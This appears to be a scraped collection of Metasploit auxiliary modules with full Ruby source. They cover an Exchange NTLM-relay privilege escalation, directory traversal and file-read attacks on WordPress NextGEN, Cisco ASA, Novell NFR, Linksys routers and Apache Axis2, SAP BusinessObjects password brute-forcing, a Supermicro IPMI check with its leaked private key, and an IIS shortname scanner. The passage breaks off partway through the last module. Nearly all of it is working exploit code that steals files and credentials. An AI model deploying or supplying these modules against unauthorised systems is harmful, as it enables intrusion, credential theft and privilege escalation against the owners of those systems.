This Metasploit module exploits a privilege escalation vulnerability found in Microsoft Exchange - CVE-2019-0724 Execution of the module will force Exchange to authenticate to an arbitrary URL over HTTP via the Exchange PushSubscription feature. This allows us to relay the NTLM authentication to a Domain Controller and authenticate with the privileges that Exchange is configured. The module is based on the work by @_dirkjan,.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  def initialize    super(      'Name'           => 'Microsoft Exchange Privilege Escalation Exploit',      'Description'    => %q{        This module exploits a privilege escalation vulnerability found in Microsoft Exchange - CVE-2019-0724        Execution of the module will force Exchange to authenticate to an arbitrary URL over HTTP via the Exchange PushSubscription feature.        This allows us to relay the NTLM authentication to a Domain Controller and authenticate with the privileges that Exchange is configured.        The module is based on the work by @_dirkjan,      },      'Author'         => [        '_dirkjan',         # Discovery and PoC        'Petros Koutroumpis' # Metasploit      ],      'References'      =>         [           [ 'CVE', '2019-0724' ],           [ 'URL', 'https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/' ]         ],       'DefaultOptions' =>        {          'SSL' => true,          'RPORT' => 443        },      'License'        => MSF_LICENSE,      'DisclosureDate' => '2019-01-21'    )    register_options(      [        OptString.new('USERNAME', [ true, "Username of any domain user with a mailbox on Exchange"]),        OptString.new('PASSWORD', [ true, "Password or password hash (in LM:NT format) of the user"]),        OptString.new('DOMAIN', [ true, "The Active Directory domain name"]),        OptString.new('TARGETURI', [ true, "Exchange Web Services API endpoint", "/EWS/Exchange.asmx" ]),        OptString.new('EXCHANGE_VERSION', [ true, "Version of Exchange (2013|2016)", "2016" ]),        OptString.new('ATTACKER_URL', [ true, "Attacker URL", nil ])      ])  end  def run    domain = datastore['DOMAIN']    uri = datastore['TARGETURI']    exchange_version = datastore['EXCHANGE_VERSION']    attacker_url = datastore['ATTACKER_URL']    req_data = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" + "\r\n"    req_data += "<soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\">" + "\r\n"    req_data += "<soap:Header>" + "\r\n"    req_data += "<t:RequestServerVersion Version=\"Exchange"+exchange_version+"\" />" + "\r\n"    req_data += "</soap:Header>" + "\r\n"    req_data += "<soap:Body>" + "\r\n"    req_data += "<m:Subscribe>" + "\r\n"    req_data += "<m:PushSubscriptionRequest SubscribeToAllFolders=\"true\">" + "\r\n"    req_data += "<t:EventTypes>" + "\r\n"    req_data += "<t:EventType>NewMailEvent</t:EventType>" + "\r\n"    req_data += "<t:EventType>ModifiedEvent</t:EventType>" + "\r\n"    req_data += "<t:EventType>MovedEvent</t:EventType>" + "\r\n"    req_data += "</t:EventTypes>" + "\r\n"    req_data += "<t:StatusFrequency>1</t:StatusFrequency>" + "\r\n"    req_data += "<t:URL>"+attacker_url+"</t:URL>" + "\r\n"    req_data += "</m:PushSubscriptionRequest>" + "\r\n"    req_data += "</m:Subscribe>" + "\r\n"    req_data += "</soap:Body>" + "\r\n"    req_data += "</soap:Envelope>" + "\r\n"    http = nil    http = Rex::Proto::Http::Client.new(      rhost,      rport.to_i,      {},      ssl,      ssl_version,      proxies,      datastore['USERNAME'],      datastore['PASSWORD']    )    http.set_config({ 'preferred_auth' => 'NTLM' })    http.set_config({ 'domain' => domain })    add_socket(http)    req = http.request_raw({      'uri' => uri,      'method' => 'POST',      'ctype' => 'text/xml; charset=utf-8',      'headers' => {            'Accept' => 'text/xml'       },      'data' => req_data    })    begin      res = http.send_recv(req)      xml = res.get_xml_document      http.close    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT, ::Rex::HostUnreachable      print_error("Connection failed")    rescue OpenSSL::SSL::SSLError, OpenSSL::Cipher::CipherError      print_error "SSL negotiation failed"    end    if res.nil?      fail_with(Failure::Unreachable, 'Connection failed')    end    if res.code == 401      fail_with(Failure::NoAccess, 'Server returned HTTP status 401 - Authentication failed')    end    if xml.nil?      fail_with(Failure::UnexpectedReply, "Empty reply from server")    end    if res.code == 500 && xml.text.include?("ErrorInvalidServerVersion")      fail_with(Failure::BadConfig, "Server does not accept this Exchange dialect. Specify a different Exchange version")    end    unless res.code == 200      fail_with(Failure::UnexpectedReply, "Server returned HTTP #{res.code}: #{xml.text}")    end    print_good("Exchange returned HTTP status 200 - Authentication was successful")    if xml.text.include? "ErrorMissingEmailAddress"      fail_with(Failure::BadConfig, "The user does not have a mailbox associated. Try a different user.")    end    unless xml.text.include? "NoError"      fail_with(Failure::Unknown, "Unknown error. Response: #{xml.text}")    end    print_good("API call was successful")  endend

Microsoft Exchange Privilege Escalation

This Metasploit module exploits an authenticated directory traversal vulnerability in WordPress Plugin "NextGEN Gallery" version 2.1.7, allowing to read arbitrary directories with the web server privileges.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'json'require 'nokogiri'class MetasploitModule < Msf::Auxiliary  include Msf::Auxiliary::Report  include Msf::Exploit::Remote::HTTP::Wordpress  include Msf::Auxiliary::Scanner  def initialize(info = {})    super(update_info(info,      'Name'           => 'WordPress NextGEN Gallery Directory Read Vulnerability',      'Description'    => %q{        This module exploits an authenticated directory traversal vulnerability        in WordPress Plugin "NextGEN Gallery" version 2.1.7, allowing        to read arbitrary directories with the web server privileges.      },      'References'     =>        [          ['WPVDB', '8165'],          ['URL', 'http://permalink.gmane.org/gmane.comp.security.oss.general/17650']        ],      'Author'         =>        [          'Sathish Kumar', # Vulnerability Discovery          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module        ],      'License'        => MSF_LICENSE    ))    register_options(      [        OptString.new('WP_USER', [true, 'A valid username', nil]),        OptString.new('WP_PASS', [true, 'Valid password for the provided username', nil]),        OptString.new('DIRPATH', [true, 'The path to the directory to read', '/etc/']),        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ])      ])  end  def user    datastore['WP_USER']  end  def password    datastore['WP_PASS']  end  def check    check_plugin_version_from_readme('nextgen-gallery', '2.1.9')  end  def get_nonce(cookie)    res = send_request_cgi(      'uri'    => normalize_uri(wordpress_url_backend, 'admin.php'),      'method' => 'GET',      'vars_get'  => {        'page'    => 'ngg_addgallery'      },      'cookie' => cookie    )    if res && res.redirect? && res.redirection      location = res.redirection      print_status("Following redirect to #{location}")      res = send_request_cgi(        'uri'    => location,        'method' => 'GET',        'cookie' => cookie      )    end    res.body.scan(/var browse_params = {"nextgen_upload_image_sec":"(.+)"};/).flatten.first  end  def parse_paths(res)    begin      j = JSON.parse(res.body)    rescue JSON::ParserError => e      elog(e)      return []    end    html = j['html']    noko = Nokogiri::HTML(html)    links = noko.search('a')    links.collect { |e| normalize_uri("#{datastore['DIRPATH']}/#{e.text}") }  end  def run_host(ip)    vprint_status("Trying to login as: #{user}")    cookie = wordpress_login(user, password)    if cookie.nil?      print_error("Unable to login as: #{user}")      return    end    store_valid_credential(user: user, private: password, proof: cookie)    vprint_status("Trying to get nonce...")    nonce = get_nonce(cookie)    if nonce.nil?      print_error("Can not get nonce after login")      return    end    vprint_status("Got nonce: #{nonce}")    traversal = "../" * datastore['DEPTH']    filename = datastore['DIRPATH']    filename = filename[1, filename.length] if filename =~ /^\//    res = send_request_cgi(      'method'    => 'POST',      'uri'       => normalize_uri(target_uri.path),      'headers'   => {        'Referer' => "http://#{rhost}/wordpress/wp-admin/admin.php?page=ngg_addgallery",        'X-Requested-With' => 'XMLHttpRequest'      },      'vars_get'  => {        'photocrati_ajax' => '1'      },      'vars_post' => {        'nextgen_upload_image_sec' => "#{nonce}",        'action' => 'browse_folder',        'dir' => "#{traversal}#{filename}"      },      'cookie'    => cookie    )    if res && res.code == 200      paths = parse_paths(res)      vprint_line(paths * "\n")      fname = datastore['DIRPATH']      path = store_loot(        'nextgen.traversal',        'text/plain',        ip,        paths * "\n",        fname      )      print_good("File saved in: #{path}")    else      print_error("Nothing was downloaded. You can try to change the DIRPATH.")    end  endend

WordPress NextGEN Gallery Directory Read

This Metasploit module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::AuthBrute  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'       => 'SAP BusinessObjects Web User Bruteforcer',      'Description'  => 'This module simply attempts to bruteforce SAP BusinessObjects users by using CmcApp.',      'References'  =>        [          # General          [ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ]        ],      'Author'     => [ 'Joshua Abraham <jabra[at]rapid7.com>' ],      'License'    => MSF_LICENSE    )    register_options(      [        Opt::RPORT(6405),      ])    register_autofilter_ports([ 6405 ])  end  def run_host(ip)    res = send_request_cgi({      'uri'   => "/PlatformServices/service/app/logon.object",      'method'  => 'GET'    }, 25)    return if not res    each_user_pass { |user, pass|      enum_user(user,pass)    }  end  def report_cred(opts)    service_data = {      address: opts[:ip],      port: opts[:port],      service_name: opts[:service_name],      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: opts[:user],      private_data: opts[:password],      private_type: :password    }.merge(service_data)    login_data = {      last_attempted_at: Time.now,      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::SUCCESSFUL,      proof: opts[:proof]    }.merge(service_data)    create_credential_login(login_data)  end  def enum_user(user, pass)    vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' password: '#{pass}'")    success = false    data = 'isFromLogonPage=true&cms=127.0.1%3A6400'    data << "&username=#{Rex::Text.uri_encode(user.to_s)}"    data << "&password=#{Rex::Text.uri_encode(pass.to_s)}"    data << '&authType=secEnterprise&backUrl=%2FApp%2Fhome.faces'    begin      res = send_request_cgi({        'uri'      => '/PlatformServices/service/app/logon.object',        'data'     => data,        'method'     => 'POST',        'headers'    =>              {                'Connection' => "keep-alive",                'Accept-Encoding' => "gzip,deflate",              },      }, 45)      return :abort if (!res or (res and res.code != 200))      if(res.body.match(/Account Information/i))        success = false      else        success = true        success      end    rescue ::Rex::ConnectionError      vprint_error("[SAP BusinessObjects] Unable to attempt authentication")      return :abort    end    if success      print_good("[SAP BusinessObjects] Successful login '#{user}' password: '#{pass}'")      report_cred(        ip: rhost,        port: rport,        service_name: 'sap-businessobjects',        user: user,        password: pass,        proof: res.body      )      return :next_user    else      vprint_error("[SAP BusinessObjects] failed to login as '#{user}' password: '#{pass}'")      return    end  endend

SAP BusinessObjects Web User Bruteforcer

This Metasploit module exploits a directory traversal vulnerability in Ciscos Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software. It lists the contents of Ciscos VPN web service which includes directories, files, and currently logged in users.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(update_info(info,      'Name'           => 'Cisco ASA Directory Traversal',      'Description'    => %q{        This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software.        It lists the contents of Cisco's VPN web service which includes directories, files, and currently logged in users.      },      'Author'         => [ 'Michał Bentkowski',  # Discovery                            'Yassine Aboukir',    # PoC                            'Shelby Pace'         # Metasploit Module                          ],      'License'        => MSF_LICENSE,      'References'     => [                           [ 'CVE', '2018-0296' ],                           [ 'EDB', '44956' ]                          ],      'DisclosureDate' => '2018-06-06'    ))    register_options(      [        OptString.new('TARGETURI', [ true, 'Path to Cisco installation', '/' ]),        OptBool.new('SSL', [ true, 'Use SSL', true ]),        Opt::RPORT(443)      ])  end  def is_accessible?    uri = normalize_uri(target_uri.path, '+CSCOE+/logon.html')    res = send_request_cgi(      'method'  =>  'GET',      'uri'     =>  uri    )    return (res && (res.body.include?("SSL VPN Service") || res.body.include?("+CSCOE+") || res.body.include?("+webvpn+") || res.body.include?("webvpnlogin")))  end  def list_files(path)    uri = normalize_uri(target_uri.path, path)    list_res = send_request_cgi(      'method'  =>  'GET',      'uri'     =>  uri    )    if list_res && list_res.code == 200      if list_res.body.match(/\/{3}sessions/)        get_sessions(list_res.body)      else        print_good(list_res.body)      end    end  end  def get_sessions(response)    session_nos = response.scan(/([0-9]{2,})/)    if session_nos.empty?      print_status("Could not detect any sessions")      print("\n")      return    end    print_good(response)    list_users(session_nos)  end  def list_users(sessions)    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'    user_ids = Array.new    sessions.each do |session_no|      users_res = send_request_cgi(        'method'  =>  'GET',        'uri'     =>  normalize_uri(target_uri.path, sessions_uri, session_no)      )      if users_res && users_res.body.include?('name')        user_ids.push(users_res.body.match(/user:(\w+)/).to_s)      end    end    unless user_ids.empty?      print_status('Users logged in:')      user_ids.each { |id| print_good(id) }      print("\n")      return    end    print_status("There are no users logged in currently")  end  def run    file_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'    cscoe_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'    paths = [file_uri, sessions_uri, cscoe_uri]    unless is_accessible?      fail_with(Failure::NotFound, 'Failed to reach Cisco web logon service')    end    paths.each { |path| list_files(path) }  endend

Cisco ASA Directory Traversal

NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and CMD 103, specifying a full pathname. This Metasploit module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'         => 'NFR Agent SRS Record Arbitrary Remote File Access',      'Description'  =>  %q{        NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve        arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and        CMD 103, specifying a full pathname. This module has been tested successfully        against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File        Reporter 1.0.1).      },      'References'   =>        [          [ 'CVE', '2012-4957' ],          [ 'URL', 'https://www.rapid7.com/blog/post/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959/' ]        ],      'Author'       =>        [          'juan vazquez'        ],      'License'      => MSF_LICENSE,      'DisclosureDate' => "Nov 16 2012"    )    register_options(    [      Opt::RPORT(3037),      OptBool.new('SSL', [true, 'Use SSL', true]),      OptString.new('RFILE', [true, 'Remote File', 'c:\\windows\\win.ini'])    ])    register_autofilter_ports([ 3037 ])  end  def run_host(ip)    record = "<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>103</CMD><PATH>#{datastore['RFILE']}</PATH></RECORD>"    md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase    message = md5 + record    print_status("Retrieving the file contents")    res = send_request_cgi(      {        'uri'     => '/FSF/CMD',        'version' => '1.1',        'method'  => 'POST',        'ctype'   => "text/xml",        'data'    => message      })    if res and res.code == 200 and not res.body =~ /<RESULT>/      loot = res.body      f = ::File.basename(datastore['RFILE'])      path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])      print_good("#{datastore['RFILE']} saved in #{path}")    else      print_error("Failed to retrieve the file contents")    end  endend

NFR Agent SRS Record Arbitrary Remote File Access

This Metasploit module checks for a static SSL certificate shipped with Supermicro Onboard IPMI controllers. An attacker with access to the publicly-available firmware can perform man-in-the-middle attacks and offline decryption of communication to the controller. This Metasploit module has been on a Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware version SMT_X9_214.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::Tcp  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  PRIVATE_KEY = <<-EOF.gsub(/^ {4}/, '')    -----BEGIN RSA PRIVATE KEY-----    MIICXQIBAAKBgQC1q1kR6chWLfwspD84Asyy6EFV6SYRGy/gILsYGtn9kCQi2RFo    bNxS5CvphbGWn9D9n5gJpTVWLWb3LwJxGuBKSRj2wrHLlejzw6kSmF+3xFCuMfxV    FSj8TM8JqlOqM1c6lvH2MSXnN7pJBVcekNKbBUEfptakPSejStljbXecSwIDAQAB    AoGAah4/FzGiboTKCyGeNA+eltsIXzCjpdZlrtwvrbLxpyXtldWKT59XS6ww4mXQ    CJYuNBhnbSrt7vrybG0vVfZHEOCvK+5YKBOtvRgrWDgs1Bkc5hsdI5gLx3jE7g6M    PuUvD7ueF4OzYeYRrOLWr957jl32n+hD/k65bKWAUp3aTDECQQDqnEPZWlmoH7Jp    6woRnEp+1cullHv8DviM5Huh+JeBotSa03p4unhKlRYSqnHdeHU2343n1VUDzvnV    LQWi5G+FAkEAxjt0S67lyuuVD842uZRHt2WSQvwt23aKzQ+EJwV0IXYzfefeLzEm    dDdvc1AJ31gweAQK89/5/1EEF40K7BJdjwJBAJDFdtTT/QlS7eyQPjlZwVp9IVp+    wvdqYZPHlkb/uLYlPZ6Aq01+e6ZCU0mXZgYtQ99lmhKaQQjFmsMiMh0va2UCQA2T    NLuaFpJ235ZdgNHknaSpiAKeUmWdEJRKY7poXTONbKlKn6SLsR50TWWQLZzl5SvS    2w0oYW5ile0m84CHIXECQQCrABn0HY4Ll9/4FX+OCWamqwENltU1GcGIogeyFymK    ZVX8QdAVoUiZoUaVku946j63WNSkI1sU/UWhL6XDt4gx    -----END RSA PRIVATE KEY-----  EOF  def initialize    super(      'Name'        => 'Supermicro Onboard IPMI Static SSL Certificate Scanner',      'Description' => %q{        This module checks for a static SSL certificate shipped with Supermicro Onboard IPMI        controllers. An attacker with access to the publicly-available firmware can perform        man-in-the-middle attacks and offline decryption of communication to the controller.        This module has been on a Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware        version SMT_X9_214.      },      'Author'       =>        [          'hdm', # Discovery and analysis          'juan' # Metasploit module        ],      'License'     => MSF_LICENSE,      'References'  =>        [          [ 'CVE', '2013-3619' ],          [ 'URL', 'https://www.rapid7.com/blog/post/2013/11/06/supermicro-ipmi-firmware-vulnerabilities/']        ],      'DisclosureDate' => 'Nov 06 2013'    )    register_options(      [        Opt::RPORT(443),      ])  end  # Fingerprint a single host  def run_host(ip)    connect(true, {"SSL" => true}) #Force SSL    cert  = OpenSSL::X509::Certificate.new(sock.peer_cert)    disconnect    unless cert      vprint_error("#{ip}:#{rport} - No certificate found")      return    end    pkey = OpenSSL::PKey::RSA.new(PRIVATE_KEY)    result = cert.verify(pkey)    if result      print_good("#{ip}:#{rport} - Vulnerable to CVE-2013-3619 (Static SSL Certificate)")      # Report with the SSL Private Key hash for the host      digest = OpenSSL::Digest::SHA1.new(pkey.public_key.to_der).to_s.scan(/../).join(":")      report_note(        :host  => ip,        :proto => 'tcp',        :port  => rport,        :type  => 'supermicro.ipmi.ssl.certificate.pkey_hash',        :data  => digest      )      report_vuln({        :host  => rhost,        :port  => rport,        :proto => 'tcp',        :name  => "Supermicro Onboard IPMI Static SSL Certificate",        :refs  => self.references      })    end  endend

Supermicro Onboard IPMI Static SSL Certificate Scanner

This Metasploit module exploits a directory traversal vulnerability which is present in different Linksys home routers, like the E1500.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'        => 'Linksys E1500 Directory Traversal Vulnerability',      'Description' => %q{          This module exploits a directory traversal vulnerability which is present in        different Linksys home routers, like the E1500.      },      'References'  =>        [          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ],          [ 'URL', 'http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml' ],          [ 'BID', '57760' ],          [ 'OSVDB', '89911' ],          [ 'EDB', '24475' ]        ],      'Author'      => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],      'License'     => MSF_LICENSE    )    register_options(      [        OptPath.new('SENSITIVE_FILES',  [ true, "File containing sensitive files, one per line",          File.join(Msf::Config.data_directory, "wordlists", "sensitive_files.txt") ]),        OptString.new('HttpUsername',[ true, 'User to login with', 'admin']),        OptString.new('HttpPassword',[ true, 'Password to login with', 'password']),      ])  end  def extract_words(wordfile)    return [] unless wordfile && File.readable?(wordfile)    begin      File.readlines(wordfile, chomp: true)    rescue ::StandardError => e      elog(e)      []    end  end  def find_files(file,user,pass)    uri = "/apply.cgi"    traversal = '../..'    data_trav = "submit_type=wsc_method2&change_action=gozila_cgi&next_page=" << traversal << file    res = send_request_cgi({      'method'  => 'POST',      'uri'     => uri,      'authorization' => basic_auth(user,pass),      'vars_post' => {        "submit_type" => "wsc_method2",        "change_action" => "gozila_cgi",        "next_page" => traversal << file      }    })    # without res.body.length we get lots of false positives    if (res and res.code == 200 and res.body.length > 0)      print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")      report_web_vuln({          :host => rhost,          :port => rport,          :vhost => datastore['VHOST'],          :path => uri,          :pname => data_trav,          :risk => 3,          :proof => data_trav,          :name => self.fullname,          :category => "web",          :method => "POST"      })      loot = store_loot("linksys.traversal.data","text/plain", rhost, res.body, file)      vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}")    elsif (res and res.code)      vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}")    end  end  def run_host(ip)    user = datastore['HttpUsername']    pass = datastore['HttpPassword']    vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")    # test login    begin      res = send_request_cgi({        'uri' => '/',        'method' => 'GET',        'authorization' => basic_auth(user,pass)      })      return if res.nil?      return if (res.headers['Server'].nil? or res.headers['Server'] !~ /httpd/)      return if (res.code == 404)      if [200, 301, 302].include?(res.code)        vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")      else        vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")        return      end    rescue ::Rex::ConnectionError      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")      return    end    extract_words(datastore['SENSITIVE_FILES']).each do |file|      find_files(file, user, pass) unless file.empty?    end  endend

Linksys E1500 Directory Traversal

This Metasploit module exploits an Apache Axis2 v1.4.1 local file inclusion (LFI) vulnerability. By loading a local XML file which contains a cleartext username and password, attackers can trivially recover authentication credentials to Axis services.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Msf::Auxiliary::Scanner  def initialize    super(      'Name'           => 'Apache Axis2 v1.4.1 Local File Inclusion',      'Description'    => %q{          This module exploits an Apache Axis2 v1.4.1 local file inclusion (LFI) vulnerability.        By loading a local XML file which contains a cleartext username and password, attackers can trivially        recover authentication credentials to Axis services.      },      'References'     =>        [          ['EDB', '12721'],          ['OSVDB', '59001'],        ],      'Author'         =>        [          'Tiago Ferreira <tiago.ccna[at]gmail.com>'        ],      'License'        =>  MSF_LICENSE    )    register_options([      Opt::RPORT(8080),      OptString.new('TARGETURI', [false, 'The path to the Axis listServices', '/axis2/services/listServices']),    ])  end  def run_host(ip)    uri = normalize_uri(target_uri.path)    begin      res = send_request_raw({        'method'  => 'GET',        'uri'     => uri,      }, 25)      if (res and res.code == 200)        res.body.to_s.match(/\/axis2\/services\/([^\s]+)\?/)        new_uri = normalize_uri("/axis2/services/#{$1}")        get_credentials(new_uri)      else        print_status("#{full_uri} - Apache Axis - The remote page not accessible")        return      end    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout    rescue ::Timeout::Error, ::Errno::EPIPE    end  end  def report_cred(opts)    service_data = {      address: opts[:ip],      port: opts[:port],      service_name: (ssl ? 'https' : 'http'),      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: opts[:user],      private_data: opts[:password],      private_type: :password    }.merge(service_data)    login_data = {      last_attempted_at: DateTime.now,      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::SUCCESSFUL,      proof: opts[:proof]    }.merge(service_data)    create_credential_login(login_data)  end  def get_credentials(uri)    lfi_payload = "?xsd=../conf/axis2.xml"    begin      res = send_request_raw({        'method'  => 'GET',        'uri'     => "#{uri}" + lfi_payload,      }, 25)      print_status("#{full_uri} - Apache Axis - Dumping administrative credentials")      if res.nil?        print_error("#{full_uri} - Connection timed out")        return      end      if (res.code == 200)        if res.body.to_s.match(/axisconfig/)          res.body.scan(/parameter\sname=\"userName\">([^\s]+)</)          username = $1          res.body.scan(/parameter\sname=\"password\">([^\s]+)</)          password = $1          print_good("#{full_uri} - Apache Axis - Credentials Found Username: '#{username}' - Password: '#{password}'")          report_cred(ip: rhost, port: rport, user: username, password: password, proof: res.body)        else          print_error("#{full_uri} - Apache Axis - Not Vulnerable")          return :abort        end      else        print_error("#{full_uri} - Apache Axis - Unrecognized #{res.code} response")        return :abort      end    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout    rescue ::Timeout::Error, ::Errno::EPIPE    end  endend

Apache Axis2 1.4.1 Local File Inclusion

The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which could allow remote attackers to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request). This was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::HttpClient  include Msf::Auxiliary::Report  include Rex::Proto::Http  def initialize(info = {})    super(      update_info(        info,        'Name'        => 'Microsoft IIS shortname vulnerability scanner',        'Description' => %q{         The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which         could allow remote attackers to disclose 8.3 filenames (short names). In 2010, Soroush Dalili         and Ali Abbasnejad discovered the original bug (GET request). This was publicly disclosed in         2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.        },        'Author'         =>          [          'Soroush Dalili', # Vulnerability discovery          'Ali Abbasnejad', # Vulnerability discovery          'MinatoTW <shaks19jais[at]gmail.com>', # Metasploit module          'egre55 <ianaustin[at]protonmail.com>' # Metasploit module          ],        'License'     => MSF_LICENSE,        'References'     =>          [            [ 'URL', 'https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/' ],            [ 'URL', 'https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability' ]          ]      )    )    register_options([      Opt::RPORT(80),      OptString.new('PATH', [ true, "The base path to start scanning from", "/" ]),      OptInt.new('THREADS', [ true, "Number of threads to use", 20])    ])    @dirs = []    @files = []    @threads = []    @queue = Queue.new    @queue_ext = Queue.new    @alpha = 'abcdefghijklmnopqrstuvwxyz0123456789!#$%&\'()-@^_`{}'    @charset_names = []    @charset_extensions = []    @charset_duplicates = []    @verb = ""    @name_size= 6    @path = ""  end  def check    is_vul ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe  rescue Rex::ConnectionError    print_bad("Failed to connect to target")  end  def is_vul    @path = datastore['PATH']    for method in ['GET', 'OPTIONS']      # Check for existing file      res1 = send_request_cgi({        'uri' => normalize_uri(@path, '*~1*'),        'method' => method      })      # Check for non-existing file      res2 = send_request_cgi({        'uri' => normalize_uri(@path,'QYKWO*~1*'),        'method' => method      })      if res1 && res1.code == 404 && res2 && res2.code != 404        @verb = method        return true      end    end    return false  rescue Rex::ConnectionError    print_bad("Failed to connect to target")  end  def get_status(f , digit , match)    # Get response code for a file/folder    res2 = send_request_cgi({      'uri' => normalize_uri(@path,"#{f}#{match}~#{digit}#{match}"),      'method' => @verb    })    return res2.code  rescue NoMethodError      print_error("Unable to connect to #{datastore['RHOST']}")  end  def get_incomplete_status(url, match, digit , ext)    # Check if the file/folder name is more than 6 by using wildcards    res2 = send_request_cgi({      'uri' => normalize_uri(@path,"#{url}#{match}~#{digit}.#{ext}*"),      'method' => @verb    })    return res2.code  rescue NoMethodError      print_error("Unable to connect to #{datastore['RHOST']}")  end  def get_complete_status(url, digit , ext)    # Check if the file/folder name is less than 6 and complete    res2 = send_request_cgi({      'uri' => normalize_uri(@path,"#{url}*~#{digit}.#{ext}"),      'method' => @verb    })    return res2.code  rescue NoMethodError      print_error("Unable to connect to #{datastore['RHOST']}")  end  def scanner    while !@queue_ext.empty?      f = @queue_ext.pop      url = f.split(':')[0]      ext = f.split(':')[1]      # Split string into name and extension and check status      status = get_incomplete_status(url, "*" , "1" , ext)      next unless status == 404      next unless ext.size <= 3      @charset_duplicates.each do |x|        if get_complete_status(url, x , ext) == 404          @files << "#{url}*~#{x}.#{ext}*"        end      end      if ext.size < 3        for c in @charset_extensions          @queue_ext << (f + c )        end      end    end  end  def scan    while !@queue.empty?      url = @queue.pop      status = get_status(url , "1" , "*")      # Check strings only upto 6 chars in length      next unless status == 404    